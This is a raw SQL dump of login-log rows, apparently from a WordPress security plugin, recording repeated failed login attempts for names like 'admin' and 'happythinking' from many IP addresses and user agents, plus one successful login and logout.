(10568, 51396, 1712320455.774027, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ,À', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10569, 51397, 1712320455.951422, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿe5êÛ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10570, 51398, 1712320463.032430, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Økr', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10571, 51399, 1712320470.128581, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿJt;%', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10572, 51400, 1712320470.567744, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‚i…¢', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10573, 51401, 1712320474.743986, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÉG%Þ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10574, 51402, 1712320492.584895, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜ú!È', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10575, 51403, 1712320493.129037, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ]W<é', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10576, 51404, 1712320499.290892, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWDº,', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10577, 51405, 1712320502.486859, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅñPù', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10578, 51406, 1712320507.097895, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxÄb', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10579, 51407, 1712320510.631067, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg0¶g', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10580, 51408, 1712320510.869115, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ°=™b', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10581, 51409, 1712320513.696836, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgK ]', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10582, 51410, 1712320515.137281, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄKâƒ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10583, 51411, 1712320522.823064, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg_­a', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10584, 51412, 1712320523.821299, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¸aôˆ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10585, 51413, 1712320525.276667, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)›6º', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10586, 51414, 1712320532.983312, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼Iïè', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10587, 51415, 1712320534.010311, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ_F¸i', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10588, 51416, 1712320538.743148, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿˆ—', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10589, 51417, 1712320540.151709, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿM.¢U', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10590, 51418, 1712320543.201230, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËÀôÓ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10591, 51419, 1712320548.451587, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ›9®', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10592, 51420, 1712320557.322930, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËÀôS', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10593, 51421, 1712320557.324084, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsö"', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10594, 51422, 1712320558.539840, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŠvÅ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10595, 51423, 1712320560.122273, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz«‚', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9704, 41323, 1701186069.030793, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9703, 41321, 1701185632.673474, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhôL“', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9702, 41320, 1701184261.798520, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ6n', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),
(9701, 41319, 1701183658.155719, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~Ö', 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9700, 41318, 1701183410.711585, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhôL“', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9699, 41316, 1701181292.839137, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½S', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9698, 41314, 1701180923.295897, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~Ö', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9697, 41312, 1701178974.006394, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ!¨', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9696, 41310, 1701176760.590753, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½z', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9695, 41305, 1701171829.638873, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9694, 41303, 1701168883.038001, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½\\', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),
(9693, 41302, 1701168147.308688, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1ª', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9692, 41301, 1701167963.367965, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¸c', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9691, 41296, 1701165489.426977, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhôL“', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9690, 41271, 1701158811.376694, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9689, 41257, 1701152105.653059, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhôL“', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(10317, 50828, 1712002164.439923, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36'),
(10318, 50829, 1712004943.999421, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36'),
(10308, 50754, 1711943179.539405, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),
(10309, 50755, 1711943182.171130, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),
(10310, 50756, 1711943184.352860, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),
(10311, 50757, 1711943187.901691, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),
(10312, 50758, 1711943189.799567, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),
(10313, 50759, 1711943191.679585, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯¥X', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),
(10324, 51067, 1712318821.644684, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿj3\\‚', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10325, 51074, 1712318937.048082, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²ß—Q', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10326, 51075, 1712318946.539288, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQÄÌÚ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10327, 51078, 1712318965.313008, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[»”Œ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10328, 51079, 1712318993.268345, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¯‰Ù', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10329, 51080, 1712318997.928891, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ_¬­­', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10296, 50713, 1711829539.732694, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿx„c1', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'),
(10330, 51082, 1712319004.411028, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgµd›', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10295, 50580, 1711667105.272546, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿKw“$', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'),
(10294, 50569, 1711645520.487583, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿWìW', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'),
(10297, 50722, 1711863542.543472, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10298, 50723, 1711863543.902289, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10290, 50397, 1711224488.351404, 1, 'loginFailInvalidUsername', 'claraklara', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"W;Ö', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10299, 50724, 1711863545.269777, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10291, 50398, 1711224490.184670, 1, 'loginFailInvalidUsername', 'claraklara', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"W;Ö', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10292, 50398, 1711224490.194468, 1, 'loginFailInvalidUsername', 'claraklara', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"W;Ö', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10293, 50418, 1711266093.580171, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;aj', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(10285, 50374, 1711146899.803108, 1, 'loginFailInvalidUsername', 'testuser', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\ÌßÍ', 'Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10286, 50375, 1711146906.037811, 1, 'loginFailInvalidUsername', 'admina', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨wi', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),
(10287, 50376, 1711146906.354794, 1, 'loginFailInvalidUsername', 'martin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-wÔ<', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(10288, 50385, 1711174960.655383, 1, 'loginFailInvalidUsername', 'cpimnadiadc', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²!Zà', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),
(10280, 50283, 1711080637.828281, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 'Mozilla/5.0'),
(10281, 50346, 1711095511.519474, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),
(10289, 50386, 1711174971.091692, 1, 'loginFailInvalidUsername', 'afom', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgš>v', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),
(10282, 50347, 1711095518.627799, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡aCå', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(10283, 50349, 1711095524.778650, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ°X)Ï', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),
(10284, 50362, 1711120922.627947, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuxZ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),
(10300, 50725, 1711863546.231455, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10301, 50726, 1711863547.567156, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10302, 50727, 1711863548.462286, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10303, 50728, 1711863549.477866, 1, 'loginFailInvalidUsername', 'worksm8_wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§G¥é', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9308, 33069, 1694685499.841751, 1, 'loginFailInvalidUsername', '3ddaaade350b269e1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq „g', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9307, 33069, 1694685499.830810, 1, 'loginFailInvalidUsername', '3ddaaade350b269e1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq „g', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9306, 33068, 1694685496.418382, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg0´¡', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9305, 33067, 1694685492.985682, 1, 'loginFailInvalidUsername', 'lovely1!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ú,!', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9304, 33066, 1694685486.838783, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¢A', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9288, 33051, 1694685385.870912, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†ì2 ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9287, 33050, 1694685382.424800, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%()', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9286, 33050, 1694685382.411549, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%()', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9285, 33049, 1694685377.273239, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿX÷5Ø', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9284, 33048, 1694685372.449878, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Œk', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9250, 33015, 1694685152.812764, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*M˜', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9249, 33014, 1694685145.332948, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|)äa', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(8806, 31604, 1692901705.248638, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»}}', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8805, 31603, 1692901701.843563, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿßÌì	', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8804, 31602, 1692901698.230001, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg«÷h', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8803, 31601, 1692901680.029815, 1, 'loginFailInvalidUsername', '*ce4f703eebc8e3bf98e6f776506fb5151e666377!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgS\Z', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8802, 31600, 1692901674.628303, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»ê3', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8801, 31599, 1692901671.592870, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO—"Ž', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8800, 31598, 1692901664.350629, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀmÛ:', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8762, 31262, 1692516619.049083, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgl÷', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8761, 31257, 1692514224.272188, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿšÆp^', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8760, 31243, 1692506719.830818, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ+û^a', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(8758, 31201, 1692471532.546520, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ òmj', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
